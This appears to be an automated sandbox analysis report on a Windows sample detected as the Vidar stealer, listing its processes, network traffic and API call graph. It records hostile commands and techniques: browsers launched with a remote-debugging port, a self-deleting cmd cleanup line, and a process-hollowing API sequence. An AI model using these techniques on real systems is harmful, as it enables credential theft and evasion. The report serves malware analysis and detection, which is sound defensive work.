                                                                                                                                                                                                                                                                        Content-Length: 466
                                                                                                                                                                                                                                                                        Content-Type: application/reports+json
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                        2024-12-27 07:21:41 UTC466OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 39 39 32 36 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 36 39 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 33 2e 31 30 37 2e 36 2e 31 35 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 31 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 62 69 6e
                                                                                                                                                                                                                                                                        Data Ascii: [{"age":59926,"body":{"elapsed_time":2692,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"13.107.6.158","status_code":401,"type":"http.error"},"type":"network-error","url":"https://business.bin
                                                                                                                                                                                                                                                                        2024-12-27 07:21:42 UTC334INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Server: Kestrel
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:21:42 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        PMUSER_FORMAT_QS:
                                                                                                                                                                                                                                                                        X-CDN-TraceId: 0.84112317.1735284101.706e6fa3
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *


                                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                        Start time:02:19:56
                                                                                                                                                                                                                                                                        Start date:27/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\aD7D9fkpII.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x870000
                                                                                                                                                                                                                                                                        File size:406'528 bytes
                                                                                                                                                                                                                                                                        MD5 hash:6B3FBDAF99ECE34F12DC443F1C630812
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2333287730.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                                                        Start time:02:19:56
                                                                                                                                                                                                                                                                        Start date:27/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                                                        Start time:02:19:57
                                                                                                                                                                                                                                                                        Start date:27/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\aD7D9fkpII.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x870000
                                                                                                                                                                                                                                                                        File size:406'528 bytes
                                                                                                                                                                                                                                                                        MD5 hash:6B3FBDAF99ECE34F12DC443F1C630812
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                                                        Start time:02:19:57
                                                                                                                                                                                                                                                                        Start date:27/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\aD7D9fkpII.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x870000
                                                                                                                                                                                                                                                                        File size:406'528 bytes
                                                                                                                                                                                                                                                                        MD5 hash:6B3FBDAF99ECE34F12DC443F1C630812
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                        Start time:02:19:57
                                                                                                                                                                                                                                                                        Start date:27/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\aD7D9fkpII.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x870000
                                                                                                                                                                                                                                                                        File size:406'528 bytes
                                                                                                                                                                                                                                                                        MD5 hash:6B3FBDAF99ECE34F12DC443F1C630812
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: infostealer_win_vidar_strings_nov23, Description: Finds Vidar samples based on the specific strings, Source: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Sekoia.io
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                                        Start time:02:19:57
                                                                                                                                                                                                                                                                        Start date:27/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6408 -s 372
                                                                                                                                                                                                                                                                        Imagebase:0xfa0000
                                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                                        Start time:02:20:14
                                                                                                                                                                                                                                                                        Start date:27/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                                        Start time:02:20:15
                                                                                                                                                                                                                                                                        Start date:27/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2304,i,13937775269766581777,3924065134902446641,262144 /prefetch:8
                                                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                                                        Start time:02:20:30
                                                                                                                                                                                                                                                                        Start date:27/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                                                        Start time:02:20:31
                                                                                                                                                                                                                                                                        Start date:27/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                                                                        Start time:02:20:31
                                                                                                                                                                                                                                                                        Start date:27/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2704 --field-trial-handle=2636,i,10720928867294864621,14474913477084532862,262144 /prefetch:3
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                                                        Start time:02:20:31
                                                                                                                                                                                                                                                                        Start date:27/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=2124,i,17907551235246420035,16935429163833777043,262144 /prefetch:3
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                                                        Start time:02:20:35
                                                                                                                                                                                                                                                                        Start date:27/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6544 --field-trial-handle=2124,i,17907551235246420035,16935429163833777043,262144 /prefetch:8
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                                                        Start time:02:20:35
                                                                                                                                                                                                                                                                        Start date:27/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6728 --field-trial-handle=2124,i,17907551235246420035,16935429163833777043,262144 /prefetch:8
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                                                        Start time:02:21:09
                                                                                                                                                                                                                                                                        Start date:27/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\TRQ9ZCBA1N7Q" & exit
                                                                                                                                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                                                        Start time:02:21:09
                                                                                                                                                                                                                                                                        Start date:27/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                                                        Start time:02:21:09
                                                                                                                                                                                                                                                                        Start date:27/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:timeout /t 10
                                                                                                                                                                                                                                                                        Imagebase:0xdb0000
                                                                                                                                                                                                                                                                        File size:25'088 bytes
                                                                                                                                                                                                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                                                        Start time:02:21:31
                                                                                                                                                                                                                                                                        Start date:27/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6640 --field-trial-handle=2124,i,17907551235246420035,16935429163833777043,262144 /prefetch:8
                                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:8.7%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                          Signature Coverage:5.4%
                                                                                                                                                                                                                                                                          Total number of Nodes:295
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:3
                                                                                                                                                                                                                                                                          execution_graph 20560 881a88 20583 8819f9 GetModuleHandleExW 20560->20583 20563 881ace 20565 8819f9 Concurrency::details::_Reschedule_chore GetModuleHandleExW 20563->20565 20567 881ad4 20565->20567 20568 881af5 20567->20568 20605 8819dc GetModuleHandleExW 20567->20605 20585 87e250 20568->20585 20571 881ae5 20571->20568 20572 881aeb FreeLibraryWhenCallbackReturns 20571->20572 20572->20568 20574 8819f9 Concurrency::details::_Reschedule_chore GetModuleHandleExW 20575 881b0b 20574->20575 20576 881b39 20575->20576 20577 87b1f0 47 API calls 20575->20577 20578 881b17 20577->20578 20579 88386f ReleaseSRWLockExclusive 20578->20579 20580 881b2a 20579->20580 20580->20576 20606 8834df WakeAllConditionVariable 20580->20606 20584 881a0f 20583->20584 20584->20563 20594 87b1f0 20584->20594 20607 874560 20585->20607 20587 87e271 std::_Throw_Cpp_error 20611 87f1c0 20587->20611 20590 87e29f 20619 8811f9 20590->20619 20592 87e2a9 20592->20574 20595 87b204 std::_Throw_Cpp_error 20594->20595 20706 88385e 20595->20706 20599 87b221 20600 87b23d 20599->20600 20710 881c19 40 API calls 2 library calls 20599->20710 20602 88386f 20600->20602 20603 88388a 20602->20603 20604 88387c ReleaseSRWLockExclusive 20602->20604 20603->20563 20604->20603 20605->20571 20606->20576 20608 874590 20607->20608 20609 8811f9 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20608->20609 20610 87459d 20609->20610 20610->20587 20612 874560 5 API calls 20611->20612 20613 87f1e1 std::_Throw_Cpp_error 20612->20613 20626 880010 20613->20626 20614 87f1f3 20615 8811f9 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20614->20615 20616 87e297 20615->20616 20618 87e2e0 CloseThreadpoolWork std::_Throw_Cpp_error 20616->20618 20618->20590 20620 881201 20619->20620 20621 881202 IsProcessorFeaturePresent 20619->20621 20620->20592 20623 883bd1 20621->20623 20705 883cb7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20623->20705 20625 883cb4 20625->20592 20627 880027 20626->20627 20632 880160 20627->20632 20629 880036 20629->20614 20630 88002e std::_Throw_Cpp_error 20630->20629 20639 880220 20630->20639 20644 87d560 20632->20644 20634 880187 20647 87d690 20634->20647 20637 8811f9 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20638 8801e1 20637->20638 20638->20630 20654 880260 20639->20654 20642 8811f9 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20643 880250 20642->20643 20643->20629 20645 87b1f0 47 API calls 20644->20645 20646 87d57e 20645->20646 20646->20634 20650 87b2a0 20647->20650 20651 87b2b1 std::_Throw_Cpp_error 20650->20651 20652 88386f ReleaseSRWLockExclusive 20651->20652 20653 87b2b9 20652->20653 20653->20637 20655 880281 20654->20655 20664 880430 20655->20664 20657 8802c1 20667 8803c0 20657->20667 20661 8802e7 20662 8811f9 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20661->20662 20663 880243 20662->20663 20663->20642 20674 880570 20664->20674 20666 880450 20666->20657 20668 8803e4 20667->20668 20689 880500 20668->20689 20670 8803ff 20671 8811f9 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20670->20671 20672 8802d1 20671->20672 20673 880300 143 API calls __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 20672->20673 20673->20661 20675 8805a1 20674->20675 20680 8805e0 20675->20680 20677 8805b4 20678 8811f9 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20677->20678 20679 8805cb 20678->20679 20679->20666 20681 8805f7 20680->20681 20684 880620 20681->20684 20683 880605 20683->20677 20685 88063d 20684->20685 20687 880645 Concurrency::details::_ContextCallback::_CallInContext 20685->20687 20688 880670 31 API calls 2 library calls 20685->20688 20687->20683 20688->20687 20690 880514 Concurrency::details::_ContextCallback::_CallInContext 20689->20690 20692 88051c Concurrency::details::_ContextCallback::_CallInContext 20690->20692 20698 881da0 RaiseException Concurrency::cancel_current_task 20690->20698 20695 880790 20692->20695 20699 880830 20695->20699 20702 880850 20699->20702 20703 87b9e0 Concurrency::details::_ContextCallback::_CallInContext 134 API calls 20702->20703 20704 880539 20703->20704 20704->20670 20705->20625 20711 88388e GetCurrentThreadId 20706->20711 20709 881c19 40 API calls 2 library calls 20712 8838b8 20711->20712 20713 8838d7 20711->20713 20715 8838cd 20712->20715 20716 8838bd AcquireSRWLockExclusive 20712->20716 20714 8838e0 20713->20714 20722 8838f7 20713->20722 20714->20715 20717 8838eb AcquireSRWLockExclusive 20714->20717 20719 8811f9 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20715->20719 20716->20715 20717->20715 20718 883956 20718->20715 20720 88395d TryAcquireSRWLockExclusive 20718->20720 20721 87b20c 20719->20721 20720->20715 20721->20599 20721->20709 20722->20718 20724 88390f 20722->20724 20724->20715 20725 883946 TryAcquireSRWLockExclusive 20724->20725 20726 88454d GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime __aulldiv __aullrem __Xtime_get_ticks 20724->20726 20725->20715 20725->20724 20726->20724 20963 884188 49 API calls _unexpected 20964 887389 56 API calls 4 library calls 20965 881589 DeleteCriticalSection 20886 88788f 7 API calls ___scrt_uninitialize_crt 20966 877180 31 API calls std::_Throw_Cpp_error 20889 88109a 33 API calls std::_Throw_Cpp_error 20875 8ac19e 20876 8ac1d4 20875->20876 20877 8ac321 GetPEB 20876->20877 20878 8ac333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 20876->20878 20881 8ac3ca TerminateProcess 20876->20881 20877->20878 20878->20876 20879 8ac3da WriteProcessMemory 20878->20879 20880 8ac41f 20879->20880 20882 8ac461 WriteProcessMemory Wow64SetThreadContext ResumeThread 